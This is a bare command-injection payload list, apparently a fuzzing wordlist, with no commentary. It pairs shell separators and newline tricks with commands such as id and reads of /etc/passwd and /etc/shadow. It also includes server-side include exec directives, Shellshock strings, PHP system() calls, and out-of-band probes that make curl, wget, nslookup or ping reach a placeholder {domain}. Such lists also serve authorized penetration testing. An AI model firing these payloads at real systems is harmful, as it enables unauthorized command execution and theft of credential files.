&lt;!--#exec%20cmd=&quot;/bin/cat%20/etc/passwd&quot;--&gt;
&lt;!--#exec%20cmd=&quot;/bin/cat%20/etc/shadow&quot;--&gt;
&lt;!--#exec%20cmd=&quot;/usr/bin/id;--&gt;
&lt;!--#exec%20cmd=&quot;/usr/bin/id;--&gt;
/index.html|id|
;id;
;id
;netstat -a;
;system('cat%20/etc/passwd')
;id;
|id
|/usr/bin/id
|id|
|/usr/bin/id|
||/usr/bin/id|
|id;
||/usr/bin/id;
;id|
;|/usr/bin/id|
\n/bin/ls -al\n
\n/usr/bin/id\n
\nid\n
\n/usr/bin/id;
\nid;
\n/usr/bin/id|
\nid|
;/usr/bin/id\n
;id\n
|usr/bin/id\n
|nid\n
`id`
`/usr/bin/id`
a);id
a;id
a);id;
a;id;
a);id|
a;id|
a)|id
a|id
a)|id;
a|id
|/bin/ls -al
a);/usr/bin/id
a;/usr/bin/id
a);/usr/bin/id;
a;/usr/bin/id;
a);/usr/bin/id|
a;/usr/bin/id|
a)|/usr/bin/id
a|/usr/bin/id
a)|/usr/bin/id;
a|/usr/bin/id
;system('cat%20/etc/passwd')
;system('id')
;system('/usr/bin/id')
%0Acat%20/etc/passwd
%0A/usr/bin/id
%0Aid
%0A/usr/bin/id%0A
%0Aid%0A
& ping -i 30 127.0.0.1 &
& ping -n 30 127.0.0.1 &
%0a ping -i 30 127.0.0.1 %0a
`ping 127.0.0.1`
| id
& id
; id
%0a id %0a
`id`
$;/usr/bin/id
() { :;}; /bin/bash -c "sleep 1 && echo vulnerable 1"
() { :;}; /bin/bash -c "sleep 3 && echo vulnerable 3"
() { :;}; /bin/bash -c "sleep 6 && echo vulnerable 6"
cat /etc/hosts
$(`cat /etc/passwd`)
cat /etc/passwd
%0Acat%20/etc/passwd
{{ get_user_file("/etc/passwd") }}
<!--#exec cmd="/bin/cat /etc/passwd"-->
<!--#exec cmd="/bin/cat /etc/shadow"-->
<!--#exec cmd="/usr/bin/id;-->
system('cat /etc/passwd');
<?php system("cat /etc/passwd");?>
||curl {domain}||
|curl {domain}|
&&curl {domain}&&
&curl {domain}&
&&curl {domain}
&curl {domain}
|curl {domain}
||curl {domain}
;curl {domain}
;curl {domain}&&
;curl {domain}&
;curl {domain}|
;curl {domain}||
;curl {domain};
||nslookup {domain}||
|nslookup {domain}|
&&nslookup {domain}&&
&nslookup {domain}&
&&nslookup {domain}
&nslookup {domain}
|nslookup {domain}
||nslookup {domain}
;nslookup {domain}
;nslookup {domain}&&
;nslookup {domain}&
;nslookup {domain}|
;nslookup {domain}||
;nslookup {domain};
||ping {domain}||
|ping {domain}|
&&ping {domain}&&
&ping {domain}&
&&ping {domain}
&ping {domain}
|ping {domain}
||ping {domain}
;ping {domain}
;ping {domain}&&
;ping {domain}&
;ping {domain}|
;ping {domain}||
;ping {domain};
||wget {domain}||
|wget {domain}|
&&wget {domain}&&
&wget {domain}&
&&wget {domain}
&wget {domain}
|wget {domain}
||wget {domain}
;wget {domain}
;wget {domain}&&
;wget {domain}&
;wget {domain}|
;wget {domain}||
;wget {domain};
<?php echo curl_exec(curl_init("http://{domain}")); ?>
<?php echo file_get_contents("http://{domain}"); ?>
